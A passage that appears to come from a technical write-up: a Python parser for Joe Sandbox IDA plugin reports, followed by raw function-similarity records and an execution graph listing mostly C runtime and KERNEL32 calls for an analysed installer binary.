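• Source File: 00000006.00000002.1925104942.000000006CA96000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CA96000, based on PE: true
• API ID: H_prolog
• String ID: WZJ
• Instruction Fuzzy Hash: 1B813A31D00159DFCF15DFA8DA91ADDBBB4AF09308F14409AE416B77A0DB30AE89CB61
"""

# "Name.MODULE(args), ref: ADDR" or "Name.MODULE ref: ADDR", optionally prefixed
# with "Part of subcall function ADDR: " when the call is reached indirectly.
API_RE = re.compile(
    r"^(?:Part of subcall function (?P<sub>[0-9A-F]+): )?"
    r"(?P<name>\w+)\.(?P<module>\w+)(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]+)$"
)

@dataclass
class ApiCall:
    name: str
    module: str
    args: list
    ref: str            # address of the call site inside the dumped module
    via_subcall: str    # sub-function address when indirect, else ""

@dataclass
class FunctionRecord:
    module_base: str = ""   # "Offset:" of the source dump, i.e. the module's load base
    api_id: str = ""
    string_id: str = ""
    instruction_fuzzy_hash: str = ""
    calls: list = field(default_factory=list)

def _value(line):
    return line.split(":", 1)[1].strip()

def parse_records(text):
    """Return one FunctionRecord per report block, in document order."""
    records, cur = [], FunctionRecord()
    for raw in text.splitlines():
        line = raw.strip().lstrip("•").strip()
        m = API_RE.match(line)
        if m:
            args = m["args"].split(",") if m["args"] is not None else []
            cur.calls.append(ApiCall(m["name"], m["module"], args, m["ref"], m["sub"] or ""))
        elif line.startswith("Source File:"):
            off = re.search(r"Offset:\s*([0-9A-F]+)", line)
            cur.module_base = off.group(1) if off else ""
        elif line.startswith("API ID:"):
            cur.api_id = _value(line)
        elif line.startswith("String ID:"):
            cur.string_id = _value(line)
        elif line.startswith("Instruction Fuzzy Hash:"):
            cur.instruction_fuzzy_hash = _value(line)
            records.append(cur)         # last field of a record in the report layout
            cur = FunctionRecord()
    return records

def direct_api_histogram(records):
    """Count direct call sites per 'Name.MODULE'; calls via a sub-function are excluded."""
    return Counter(f"{c.name}.{c.module}" for r in records for c in r.calls if not c.via_subcall)

def by_module_base(records):
    """Group records by the dumped module they were lifted from."""
    grouped = defaultdict(list)
    for r in records:
        grouped[r.module_base].append(r)
    return dict(grouped)
```

Names such as __dosmaperr, __EH_prolog, ___initconout and _free are MSVC C runtime routines, so a histogram of direct imports per module base is a quick way to set the statically linked CRT aside and concentrate on the functions that import anything beyond KERNEL32 and LIBCMT. The sub-function flag matters for the same reason: in the first record, CreateFileW on CONOUT$ belongs to the CRT console initialiser at 6CA84D2F, not to the function the record describes.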
                        APIs
                        • ___std_exception_destroy.LIBVCRUNTIME ref: 6C932A76
                        Strings
                        Memory Dump Source
                        • Source File: 00000006.00000002.1923884064.000000006C8E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8E0000, based on PE: true
                        • Associated: 00000006.00000002.1923861024.000000006C8E0000.00000002.00000001.01000000.00000009.sdmp
                        • Associated: 00000006.00000002.1925035460.000000006CA86000.00000002.00000001.01000000.00000009.sdmp
                        • Associated: 00000006.00000002.1925104942.000000006CA96000.00000008.00000001.01000000.00000009.sdmp
                        • Associated: 00000006.00000002.1925695581.000000006CB61000.00000004.00000001.01000000.00000009.sdmp
                        • Associated: 00000006.00000002.1925724644.000000006CB67000.00000020.00000001.01000000.00000009.sdmp
                        • Associated: 00000006.00000002.1926382787.000000006CC4D000.00000002.00000001.01000000.00000009.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_6c8e0000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                        Similarity
                        • API ID: ___std_exception_destroy
                        • String ID: Jbx$Jbx
                        • API String ID: 4194217158-1161259238
                        • Opcode ID: 4084fb03b19df9d268515f89dbb967c0ef4b516da9eca22a3b28ed15612e4972
                        • Instruction ID: 656b7d2dfd320de516b23b0dde53a27ac4683b37cbfa13db14cab4b8200e2c4b
                        • Opcode Fuzzy Hash: 4084fb03b19df9d268515f89dbb967c0ef4b516da9eca22a3b28ed15612e4972
                        • Instruction Fuzzy Hash: 935125B19002148FCB14CF59D9846AEBBB5FF89304F14856EE849DBB42E331E989CBD1
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000006.00000002.1925104942.000000006CA96000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CA96000, based on PE: true
                        • Associated: 00000006.00000002.1925695581.000000006CB61000.00000004.00000001.01000000.00000009.sdmp
                        • Associated: 00000006.00000002.1925724644.000000006CB67000.00000020.00000001.01000000.00000009.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_6c8e0000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                        Similarity
                        • API ID: H_prolog
                        • String ID: <dJ$Q
                        • API String ID: 3519838083-2252229148
                        • Opcode ID: 8611fd72bf4170e71673488c417c1a53bfaf30d487d7fd955d74d6e9e56554ac
                        • Instruction ID: fac57a84f4d4c69c6e3dcf2682ff2e5883cd002214f97153b608177a8dbbbb95
                        • Opcode Fuzzy Hash: 8611fd72bf4170e71673488c417c1a53bfaf30d487d7fd955d74d6e9e56554ac
                        • Instruction Fuzzy Hash: 1A519C7091421AEFCF00DFA8D8808EDB7B5FF49308F24856EE515BBA50D7319A89CB91
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000006.00000002.1925104942.000000006CA96000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CA96000, based on PE: true
                        • Associated: 00000006.00000002.1925695581.000000006CB61000.00000004.00000001.01000000.00000009.sdmp
                        • Associated: 00000006.00000002.1925724644.000000006CB67000.00000020.00000001.01000000.00000009.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_6c8e0000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                        Similarity
                        • API ID: H_prolog
                        • String ID: $D^J
                        • API String ID: 3519838083-3977321784
                        • Opcode ID: 592ff2149492c1b5d1f5267e2a791cd36de2b3efa6476b1a9cfe308cba17f1e8
                        • Instruction ID: 08fd07db964c0e8b54c6a715ee589b437b82e6b6ae67bb36c05d712879a6b635
                        • Opcode Fuzzy Hash: 592ff2149492c1b5d1f5267e2a791cd36de2b3efa6476b1a9cfe308cba17f1e8
                        • Instruction Fuzzy Hash: 7A414A20A155946EDB22AA3887907ECBBFD9F36208F1C815CC496A7E91DB7459CFC390
                        APIs
                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00000000,?,?,00000000,6CA834F6), ref: 6CA7BE3B
                        • __dosmaperr.LIBCMT ref: 6CA7BE42
                        Strings
                        Memory Dump Source
                        • Source File: 00000006.00000002.1923884064.000000006C8E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8E0000, based on PE: true
                        • Associated: 00000006.00000002.1923861024.000000006C8E0000.00000002.00000001.01000000.00000009.sdmp
                        • Associated: 00000006.00000002.1925035460.000000006CA86000.00000002.00000001.01000000.00000009.sdmp
                        • Associated: 00000006.00000002.1925104942.000000006CA96000.00000008.00000001.01000000.00000009.sdmp
                        • Associated: 00000006.00000002.1925695581.000000006CB61000.00000004.00000001.01000000.00000009.sdmp
                        • Associated: 00000006.00000002.1925724644.000000006CB67000.00000020.00000001.01000000.00000009.sdmp
                        • Associated: 00000006.00000002.1926382787.000000006CC4D000.00000002.00000001.01000000.00000009.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_6c8e0000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                        Similarity
                        • API ID: ErrorLast__dosmaperr
                        • String ID: 8Q
                        • API String ID: 1659562826-4022487301
                        • Opcode ID: 7cc58f63c5f8b5a3ed097df8095bc0d1e6de3f7a52734ccdce6df0e5c9a7b87e
                        • Instruction ID: e036a79dce14c5bbdfb3e0a62698eae9be0ff42297c9f0bf70abdfe30494caa5
                        • Opcode Fuzzy Hash: 7cc58f63c5f8b5a3ed097df8095bc0d1e6de3f7a52734ccdce6df0e5c9a7b87e
                        • Instruction Fuzzy Hash: 1941A8B9604154AFDB318F29D990AA97FF5FF46388F284398E9808B742D7319C9587B0
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000006.00000002.1925104942.000000006CA96000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CA96000, based on PE: true
                        • Associated: 00000006.00000002.1925695581.000000006CB61000.00000004.00000001.01000000.00000009.sdmp
                        • Associated: 00000006.00000002.1925724644.000000006CB67000.00000020.00000001.01000000.00000009.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_6c8e0000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                        Similarity
                        • API ID: H_prolog
                        • String ID: X&L$p|J
                        • API String ID: 3519838083-2944591232
                        • Opcode ID: 9119c1f64bb26ad996fbea7536e901d29dd4483baa18a121855aa129662547ca
                        • Instruction ID: 928d3de34171e2dbc92f339f54fae6af125c3e2576f773ae10c11d58c5fc5d4c
                        • Opcode Fuzzy Hash: 9119c1f64bb26ad996fbea7536e901d29dd4483baa18a121855aa129662547ca
                        • Instruction Fuzzy Hash: 44314E31E47105CBDB108B5CDE02BBD77B1EB22718F160126E691E3EA0CB60B9C9CB51
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000006.00000002.1925104942.000000006CA96000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CA96000, based on PE: true
                        • Associated: 00000006.00000002.1925695581.000000006CB61000.00000004.00000001.01000000.00000009.sdmp
                        • Associated: 00000006.00000002.1925724644.000000006CB67000.00000020.00000001.01000000.00000009.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_6c8e0000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                        Similarity
                        • API ID: H_prolog
                        • String ID: 0|J$`)L
                        • API String ID: 3519838083-117937767
                        • Opcode ID: 924921a2771934cbe07cb1819a4d5bd42f54cfcb7b164b76471555bcaac8b42b
                        • Instruction ID: 8908a87589afe1f9639e49a3c0cc2382ebda6ca0025178a89452f5e81892c422
                        • Opcode Fuzzy Hash: 924921a2771934cbe07cb1819a4d5bd42f54cfcb7b164b76471555bcaac8b42b
                        • Instruction Fuzzy Hash: 9941B031601741DFCF118F60C5947EABBE2FF45208F04452EE09A9BB10CB316889DB51
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000006.00000002.1925104942.000000006CA96000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CA96000, based on PE: true
                        • Associated: 00000006.00000002.1925695581.000000006CB61000.00000004.00000001.01000000.00000009.sdmp
                        • Associated: 00000006.00000002.1925724644.000000006CB67000.00000020.00000001.01000000.00000009.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_6c8e0000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                        Similarity
                        • API ID: __aulldiv
                        • String ID: 3333
                        • API String ID: 3732870572-2924271548
                        • Opcode ID: 0d34d547a1763b1f6cbcb81569cbe66ca114cba913daa42be50c89cb46dd64ee
                        • Instruction ID: c4c3016b60a7397b879ae97c32186e10fc183757099d9e9f3851480ec90c409c
                        • Opcode Fuzzy Hash: 0d34d547a1763b1f6cbcb81569cbe66ca114cba913daa42be50c89cb46dd64ee
                        • Instruction Fuzzy Hash: D02195F09007446FD720CFBA8C84B5FBAFDEB44714F54892EA18AD7B40D770A9488B69
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000006.00000002.1925104942.000000006CA96000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CA96000, based on PE: true
                        • Associated: 00000006.00000002.1925695581.000000006CB61000.00000004.00000001.01000000.00000009.sdmp
                        • Associated: 00000006.00000002.1925724644.000000006CB67000.00000020.00000001.01000000.00000009.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_6c8e0000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                        Similarity
                        • API ID: H_prolog
                        • String ID: @$LuJ
                        • API String ID: 3519838083-205571748
                        • Opcode ID: aa36ca613ac24c818774a3b50af302aa3ac6c7e5dc6eeb3b6f96232f2efdcf83
                        • Instruction ID: 7a0592a6a764e9140f818dd55a595f63e4861d936a7565ac09829cc62a9294fb
                        • Opcode Fuzzy Hash: aa36ca613ac24c818774a3b50af302aa3ac6c7e5dc6eeb3b6f96232f2efdcf83
                        • Instruction Fuzzy Hash: 26018072E01709DACB10DFE988815AFFBB8FF59304F40842EE569E3A51C3345948CB9A
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000006.00000002.1925104942.000000006CA96000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CA96000, based on PE: true
                        • Associated: 00000006.00000002.1925695581.000000006CB61000.00000004.00000001.01000000.00000009.sdmp
                        • Associated: 00000006.00000002.1925724644.000000006CB67000.00000020.00000001.01000000.00000009.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_6c8e0000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                        Similarity
                        • API ID: H_prolog
                        • String ID: @$xMJ
                        • API String ID: 3519838083-951924499
                        • Opcode ID: 871999b8a6dfe8dd14063548d73ca1d86140603a6c3ba165e22a59db3157078a
                        • Instruction ID: 7b31bac0002eb6249cb4562694f19ae01bd847810b8a65a09e25efd78fcc8a11
                        • Opcode Fuzzy Hash: 871999b8a6dfe8dd14063548d73ca1d86140603a6c3ba165e22a59db3157078a
                        • Instruction Fuzzy Hash: 1C115A71A00209EBCB00CFD9C49059EB7B5FF19308B50C42ED429E7A40D3359A46CF95
                        APIs
                        • _free.LIBCMT ref: 6CA7CB69
                        • HeapReAlloc.KERNEL32(00000000,?,?,00000004,00000000,?,6CA7945A,?,00000004,?,4B42FCB6,?,?,6CA6E5AC,4B42FCB6,?), ref: 6CA7CBA5
                        Strings
                        Memory Dump Source
                        • Source File: 00000006.00000002.1923884064.000000006C8E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8E0000, based on PE: true
                        • Associated: 00000006.00000002.1923861024.000000006C8E0000.00000002.00000001.01000000.00000009.sdmp
                        • Associated: 00000006.00000002.1925035460.000000006CA86000.00000002.00000001.01000000.00000009.sdmp
                        • Associated: 00000006.00000002.1925104942.000000006CA96000.00000008.00000001.01000000.00000009.sdmp
                        • Associated: 00000006.00000002.1925695581.000000006CB61000.00000004.00000001.01000000.00000009.sdmp
                        • Associated: 00000006.00000002.1925724644.000000006CB67000.00000020.00000001.01000000.00000009.sdmp
                        • Associated: 00000006.00000002.1926382787.000000006CC4D000.00000002.00000001.01000000.00000009.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_6c8e0000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                        Similarity
                        • API ID: AllocHeap_free
                        • String ID: 8Q
                        • API String ID: 1080816511-4022487301
                        • Opcode ID: d4768ead4a22125742a39ea6e808828916749456ebf883a5726247f29bc81979
                        • Instruction ID: 7f8f6239d2be328700092e49c1e21dc3e847fb8149e642af8da9181ac23104c7
                        • Opcode Fuzzy Hash: d4768ead4a22125742a39ea6e808828916749456ebf883a5726247f29bc81979
                        • Instruction Fuzzy Hash: 31F0623DB421156ADB313A379C00F9B37A8BFC2ABCB294116F814A7E80DF20D5C581B4
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000006.00000002.1925104942.000000006CA96000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CA96000, based on PE: true
                        • Associated: 00000006.00000002.1925695581.000000006CB61000.00000004.00000001.01000000.00000009.sdmp
                        • Associated: 00000006.00000002.1925724644.000000006CB67000.00000020.00000001.01000000.00000009.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_6c8e0000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                        Similarity
                        • API ID: H_prologctype
                        • String ID: |zJ
                        • API String ID: 3037903784-3782439380
                        • Opcode ID: 45f9250e3087bdd449dea7a7c5ec79293aeb189375d795e63a98390aaf881842
                        • Instruction ID: c69e6a7e9182d5de3029c003cc6aab5a7498407f099464010cf59eed0f072340
                        • Opcode Fuzzy Hash: 45f9250e3087bdd449dea7a7c5ec79293aeb189375d795e63a98390aaf881842
                        • Instruction Fuzzy Hash: 71E065B26165209BEB148B49D8007EDF7A4FF54B25F11405FD117A7A41CBB1F8448791
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000006.00000002.1925104942.000000006CA96000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CA96000, based on PE: true
                        • Associated: 00000006.00000002.1925695581.000000006CB61000.00000004.00000001.01000000.00000009.sdmp
                        • Associated: 00000006.00000002.1925724644.000000006CB67000.00000020.00000001.01000000.00000009.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_6c8e0000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                        Similarity
                        • API ID: H_prologctype
                        • String ID: <oJ
                        • API String ID: 3037903784-2791053824
                        • Opcode ID: f66cbee60b40af54c04d64295f8ed3aa4e69c018a581ef3e0b0762c85e8ebc26
                        • Instruction ID: ff2da1a93c1e27420cb801d45eabef752945eb997bb6a30ce8346eb5a2971e53
                        • Opcode Fuzzy Hash: f66cbee60b40af54c04d64295f8ed3aa4e69c018a581ef3e0b0762c85e8ebc26
                        • Instruction Fuzzy Hash: 58E0ED32B111209FDB149F09D810BEEFBE4FF45718F12001FA025A3B41CBB1A8848B82
                        Strings
                        Memory Dump Source
                        • Source File: 00000006.00000002.1925104942.000000006CA96000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CA96000, based on PE: true
                        • Associated: 00000006.00000002.1925695581.000000006CB61000.00000004.00000001.01000000.00000009.sdmp
                        • Associated: 00000006.00000002.1925724644.000000006CB67000.00000020.00000001.01000000.00000009.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_6c8e0000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                        Similarity
                        • API ID:
                        • String ID: @ K$DJ$T)K$X/K
                        • API String ID: 0-3815299647
                        • Opcode ID: c2360a40d33ebeca7632374cab2a44736fbf981b028df34ec032509b6de52aa1
                        • Instruction ID: 389f545f5114cb10c704667f115da6395a07b0034986a39f7bee5b6cddca72b2
                        • Opcode Fuzzy Hash: c2360a40d33ebeca7632374cab2a44736fbf981b028df34ec032509b6de52aa1
                        • Instruction Fuzzy Hash: 5591C230A043059BDB06DF64C5507EEB7A2AF4130CF188819E8769FB85DB75A9CEC762
                        Strings
                        Memory Dump Source
                        • Source File: 00000006.00000002.1925104942.000000006CA96000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CA96000, based on PE: true
                        • Associated: 00000006.00000002.1925695581.000000006CB61000.00000004.00000001.01000000.00000009.sdmp
                        • Associated: 00000006.00000002.1925724644.000000006CB67000.00000020.00000001.01000000.00000009.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_6c8e0000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                        Similarity
                        • API ID:
                        • String ID: D)K$H)K$P)K$T)K
                        • API String ID: 0-2262112463
                        • Opcode ID: 9be5c025380eda7c216aac381ad020450c93343e5c05b53f9846b5bc651498f8
                        • Instruction ID: 4e9eabd15e308d9ddff96703eb63a7ab7b87466a12eb799658c8c3e3360cea6f
                        • Opcode Fuzzy Hash: 9be5c025380eda7c216aac381ad020450c93343e5c05b53f9846b5bc651498f8
                        • Instruction Fuzzy Hash: EB51F43092424A9BDF00CFA4D944AEEB7B1EF1431CF14461AF821A7B81DB7599DECB61

                        Execution Graph

                        Execution Coverage:4%
                        Dynamic/Decrypted Code Coverage:0%
                        Signature Coverage:0.3%
                        Total number of Nodes:2000
                        Total number of Limit Nodes:61
                        execution_graph 73210 3acefb 73211 3ad0cc 73210->73211 73212 3acf03 73210->73212 73212->73211 73257 3acae9 VariantClear 73212->73257 73214 3acf59 73214->73211 73258 3acae9 VariantClear 73214->73258 73216 3acf71 73216->73211 73259 3acae9 VariantClear 73216->73259 73218 3acf87 73218->73211 73260 3acae9 VariantClear 73218->73260 73220 3acf9d 73220->73211 73261 3acae9 VariantClear 73220->73261 73222 3acfb3 73222->73211 73262 3acae9 VariantClear 73222->73262 73224 3acfc9 73224->73211 73263 384504 malloc _CxxThrowException 73224->73263 73226 3acfdc 73264 382e04 73226->73264 73228 3ad009 73230 3ad07b 73228->73230 73232 3ad080 73228->73232 73233 3ad030 73228->73233 73229 3acfe7 73229->73228 73267 382f88 73229->73267 73286 381e40 free 73230->73286 73283 3a7a0c CharUpperW 73232->73283 73236 382e04 2 API calls 73233->73236 73239 3ad038 73236->73239 73237 3ad0c4 73287 381e40 free 73237->73287 73238 3ad08b 73284 39fdbc 4 API calls 2 library calls 73238->73284 73241 382e04 2 API calls 73239->73241 73243 3ad046 73241->73243 73273 39fdbc 4 API calls 2 library calls 73243->73273 73244 3ad0a7 73246 382fec 3 API calls 73244->73246 73248 3ad0b3 73246->73248 73247 3ad057 73274 382fec 73247->73274 73285 381e40 free 73248->73285 73253 3ad06b 73281 381e40 free 73253->73281 73255 3ad073 73282 381e40 free 73255->73282 73257->73214 73258->73216 73259->73218 73260->73220 73261->73222 73262->73224 73263->73226 73288 381e0c 73264->73288 73268 382f9a 73267->73268 73269 382fbe 73268->73269 73270 381e0c ctype 2 API calls 73268->73270 73269->73228 73269->73269 73271 382fb4 73270->73271 73293 381e40 free 73271->73293 73273->73247 73275 382ff8 73274->73275 73276 382ffc 73274->73276 73280 381e40 free 73275->73280 73276->73275 73277 381e0c ctype 2 API calls 73276->73277 73278 383010 73277->73278 73294 381e40 free 73278->73294 73280->73253 73281->73255 73282->73230 73283->73238 73284->73244 73285->73230 73286->73237 73287->73211 73289 381e1c malloc 73288->73289 73290 381e15 
73288->73290 73291 381e2a _CxxThrowException 73289->73291 73292 381e3e 73289->73292 73290->73289 73291->73292 73292->73229 73293->73269 73294->73275 73295 38c3bd 73296 38c3db 73295->73296 73297 38c3ca 73295->73297 73297->73296 73299 381e40 free 73297->73299 73299->73296 73300 3b993d 73384 3bb5b1 73300->73384 73303 3b9963 73390 391f33 73303->73390 73306 3b9975 73307 3b99b7 GetStdHandle GetConsoleScreenBufferInfo 73306->73307 73308 3b99ce 73306->73308 73307->73308 73309 381e0c ctype 2 API calls 73308->73309 73310 3b99dc 73309->73310 73511 3a7b48 73310->73511 73312 3b9a29 73540 3bb96d _CxxThrowException 73312->73540 73314 3b9a30 73541 3a7018 8 API calls 2 library calls 73314->73541 73316 3b9a7c 73542 3addb5 6 API calls 2 library calls 73316->73542 73317 3b9a66 _CxxThrowException 73317->73316 73319 3b9aa6 73321 3b9aaa _CxxThrowException 73319->73321 73329 3b9ac0 73319->73329 73320 3b9a37 73320->73316 73320->73317 73321->73329 73322 3b9b3a 73546 381fa0 fputc 73322->73546 73324 3b9bfa _CxxThrowException 73345 3b9be6 73324->73345 73326 3b9b63 fputs 73547 381fa0 fputc 73326->73547 73329->73322 73329->73324 73543 3a7dd7 7 API calls 2 library calls 73329->73543 73544 3bc077 6 API calls 73329->73544 73545 381e40 free 73329->73545 73330 3b9b79 strlen strlen 73332 3b9baa fputs fputc 73330->73332 73333 3b9e25 73330->73333 73332->73345 73555 381fa0 fputc 73333->73555 73335 3b9e2c fputs 73556 381fa0 fputc 73335->73556 73337 3b9f0c 73561 381fa0 fputc 73337->73561 73340 3b9f13 fputs 73562 381fa0 fputc 73340->73562 73342 3bb67d 12 API calls 73342->73345 73344 3b9e42 73344->73337 73377 3b9ee0 fputs 73344->73377 73557 3bb650 fputc fputs fputs fputc 73344->73557 73558 3821d8 fputs 73344->73558 73559 3bbde4 fputc fputs 73344->73559 73345->73332 73345->73333 73345->73342 73349 382e04 2 API calls 73345->73349 73361 3b9d2a fputs 73345->73361 73366 3b9d5f fputs 73345->73366 73367 3831e5 malloc _CxxThrowException free _CxxThrowException 73345->73367 73548 3821d8 fputs 73345->73548 73549 
38315e malloc _CxxThrowException free _CxxThrowException 73345->73549 73550 383221 malloc _CxxThrowException free _CxxThrowException 73345->73550 73551 381089 malloc _CxxThrowException free _CxxThrowException 73345->73551 73553 381fa0 fputc 73345->73553 73554 381e40 free 73345->73554 73346 3b9f29 73372 3b9f77 fputs 73346->73372 73379 3b9f9f 73346->73379 73563 3bb650 fputc fputs fputs fputc 73346->73563 73564 3bb5e9 fputc fputs 73346->73564 73565 3bbde4 fputc fputs 73346->73565 73349->73345 73552 3821d8 fputs 73361->73552 73366->73345 73367->73345 73560 381fa0 fputc 73377->73560 73385 3bb5bc fputs 73384->73385 73386 3b994a 73384->73386 73580 381fa0 fputc 73385->73580 73386->73303 73528 381fb3 73386->73528 73388 3bb5d5 73388->73386 73389 3bb5d9 fputs 73388->73389 73389->73386 73391 391f6c 73390->73391 73392 391f4f 73390->73392 73581 3929eb 73391->73581 73623 3a1d73 5 API calls __EH_prolog 73392->73623 73395 391f5e _CxxThrowException 73395->73391 73397 391fa3 73399 391fbc 73397->73399 73402 384fc0 5 API calls 73397->73402 73400 391fda 73399->73400 73403 382fec 3 API calls 73399->73403 73404 392022 wcscmp 73400->73404 73412 392036 73400->73412 73401 391f95 _CxxThrowException 73401->73397 73402->73399 73403->73400 73405 3920af 73404->73405 73404->73412 73625 3a1d73 5 API calls __EH_prolog 73405->73625 73407 3920a9 73626 39393c 6 API calls 2 library calls 73407->73626 73408 3920be _CxxThrowException 73408->73412 73410 3920f4 73627 39393c 6 API calls 2 library calls 73410->73627 73412->73407 73417 39219a 73412->73417 73413 392108 73414 392135 73413->73414 73628 392e04 62 API calls 2 library calls 73413->73628 73421 392159 73414->73421 73629 392e04 62 API calls 2 library calls 73414->73629 73630 3a1d73 5 API calls __EH_prolog 73417->73630 73419 3921a9 _CxxThrowException 73419->73421 73420 39227f 73586 392aa9 73420->73586 73421->73420 73422 392245 73421->73422 73631 3a1d73 5 API calls __EH_prolog 73421->73631 73426 382fec 3 API calls 73422->73426 73429 39225c 73426->73429 
73427 3922d9 73431 392302 73427->73431 73432 382fec 3 API calls 73427->73432 73428 392237 _CxxThrowException 73428->73422 73429->73420 73632 3a1d73 5 API calls __EH_prolog 73429->73632 73430 382fec 3 API calls 73430->73427 73604 384fc0 73431->73604 73432->73431 73436 392271 _CxxThrowException 73436->73420 73438 392322 73439 3926c6 73438->73439 73449 3923a1 73438->73449 73440 3928ce 73439->73440 73442 392700 73439->73442 73645 3a1d73 5 API calls __EH_prolog 73439->73645 73441 39293a 73440->73441 73458 3928d5 73440->73458 73443 39293f 73441->73443 73444 3929a5 73441->73444 73646 3932ec 14 API calls 2 library calls 73442->73646 73663 384eec 16 API calls 73443->73663 73450 3929ae _CxxThrowException 73444->73450 73467 39264d 73444->73467 73447 392713 73647 393a29 73447->73647 73454 39247a wcscmp 73449->73454 73474 39248e 73449->73474 73451 3926f2 _CxxThrowException 73451->73442 73453 39294c 73664 384ea1 8 API calls 73453->73664 73457 3924cf wcscmp 73454->73457 73454->73474 73459 3924ef wcscmp 73457->73459 73457->73474 73458->73467 73662 3a1d73 5 API calls __EH_prolog 73458->73662 73463 39250f 73459->73463 73459->73474 73460 392953 73464 384fc0 5 API calls 73460->73464 73636 3a1d73 5 API calls __EH_prolog 73463->73636 73464->73467 73465 392920 _CxxThrowException 73465->73467 73467->73306 73469 39251e _CxxThrowException 73472 39252c 73469->73472 73470 3927cf 73471 392880 73470->73471 73479 39281f 73470->73479 73658 3a1d73 5 API calls __EH_prolog 73470->73658 73476 382fec 3 API calls 73471->73476 73485 39289b 73471->73485 73482 392569 73472->73482 73637 392e04 62 API calls 2 library calls 73472->73637 73473 382fec 3 API calls 73483 3927a9 73473->73483 73474->73472 73633 384eec 16 API calls 73474->73633 73634 384ea1 8 API calls 73474->73634 73635 3a1d73 5 API calls __EH_prolog 73474->73635 73476->73485 73477 3924c1 _CxxThrowException 73477->73457 73479->73471 73486 392847 73479->73486 73659 3a1d73 5 API calls __EH_prolog 73479->73659 73481 39258c 73488 3925a4 73481->73488 
73639 392a61 malloc _CxxThrowException free _CxxThrowException memcpy 73481->73639 73482->73481 73638 392e04 62 API calls 2 library calls 73482->73638 73483->73470 73657 383563 memmove 73483->73657 73484 392811 _CxxThrowException 73484->73479 73485->73467 73661 3a1d73 5 API calls __EH_prolog 73485->73661 73486->73471 73660 3a1d73 5 API calls __EH_prolog 73486->73660 73640 384eec 16 API calls 73488->73640 73494 3925ad 73641 3a1b07 49 API calls 73494->73641 73495 3928c0 _CxxThrowException 73495->73440 73496 392839 _CxxThrowException 73496->73486 73499 392872 _CxxThrowException 73499->73471 73500 3925b4 73642 384ea1 8 API calls 73500->73642 73502 3925bb 73503 382fec 3 API calls 73502->73503 73505 3925d6 73502->73505 73503->73505 73504 39261f 73504->73467 73507 382fec 3 API calls 73504->73507 73505->73467 73505->73504 73643 3a1d73 5 API calls __EH_prolog 73505->73643 73509 39263f 73507->73509 73508 392611 _CxxThrowException 73508->73504 73644 38859e malloc _CxxThrowException free _CxxThrowException 73509->73644 73512 3a7b52 __EH_prolog 73511->73512 73700 3a7eec 73512->73700 73514 3a7ca4 73514->73312 73516 3830ea malloc _CxxThrowException free 73523 3a7b63 73516->73523 73517 382e04 malloc _CxxThrowException 73517->73523 73519 381e40 free ctype 73519->73523 73522 3c04d2 5 API calls 73522->73523 73523->73514 